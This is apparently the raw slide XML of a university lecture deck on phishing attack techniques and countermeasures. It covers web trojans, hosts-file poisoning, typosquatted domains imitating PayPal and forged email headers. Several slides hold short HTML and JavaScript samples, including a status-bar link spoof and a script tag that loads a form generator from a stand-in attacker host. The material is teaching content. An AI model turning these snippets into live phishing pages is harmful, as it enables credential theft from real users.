                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Web Trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> – Malicious programs that pop up to collect credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Host File Poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> – Host file modification to refer to a malicious address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Data Theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> – Stealing confidential information stored on the computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1986811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D96797D-0B2F-4724-8208-A28F7FEF4C84}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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214385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1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/1/2019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458200" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="850900"/>
            <a:ext cx="4152900" cy="5245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quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686300" y="850900"/>
            <a:ext cx="4152900" cy="254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Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686300" y="3549650"/>
            <a:ext cx="4152900" cy="254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Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M. Zulkernine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>QRST-</a:t>
            </a:r>
            <a:fld id="{57AF9941-BE8A-4F3D-B5E8-69479F627826}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" b="0"/>
              <a:t> </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7/1/2019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7/1/2019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www.antiphishing.org/reports/apwg_report_november_2006.pdf"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www.cert-in.org.in/training/15thjuly05/phishing.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://72.14.235.104/search?q=cache:-T6-U5dhgYAJ:www.avira.com/en/threats/what_is_phishing.html+Phishing+consequences&amp;hl=en&amp;gl=in&amp;ct=clnk&amp;cd=7"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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Phishing Attack Techniques and Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="7 Rectángulo redondeado"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2971800"/>
            <a:ext cx="6400800" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:pr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lvl="0" algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRP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Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Hossain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Shahriar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRP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Department of Information Technology</a:t>
            </a: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Kennesaw State University</a:t>
            </a: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Kennesaw, GA 30144, USA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185057" y="190500"/>
            <a:ext cx="8828314" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>How to view a website’s certificate (cont.)?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1928132" y="723900"/>
            <a:ext cx="5114925" cy="5241471"/>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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="152400"/>
            <a:ext cx="7010400" cy="546100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack techniques (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" cap="small" dirty="0">
              <a:latin typeface="Calibri (Headings)"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="914400"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Leveraging Document Object Model (DOM) feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>event handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can be used to set the address bar good of an anchor tag, despite it points to an attacker controlled website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cross site scripting (XSS)-based form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScript code can be used to generate forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (“&lt;form method =‘post’&gt; … … &lt;/form&gt; ”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The JavaScript code may be loaded from an attacker controlled source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>langauge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://www.evilwebsite.com/generateform.js”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="2209800"/>
          <a:ext cx="7543800" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7543800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1066800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>href</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> = “www.evilwebsite.com” </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>onMouseOver</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> = “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>window.status</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>='www.goodwebsite.com’;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>” &gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>click here &lt;/a&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">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457200" y="0"/>
            <a:ext cx="8229600" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack techniques (Spoofing URL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Substitute one or more letters in domain name that may go unnoticed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.paypai.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>typejacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.paypal.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Register a cousin domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paypal-security.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can be used to spoof </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paypal.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Once, domain is setup, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>phisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> can send email to potential victims from paypal-security.com</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152400" y="152400"/>
            <a:ext cx="8763000" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack techniques (forging email header)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simple Mail Transfer Protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>doesn't verify Headers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reply-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return-Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Message-ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> can be forged easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Received </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>filed is the most reliable lines in an email header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>They are completely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>unforgeable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> after the point where it was injected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7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
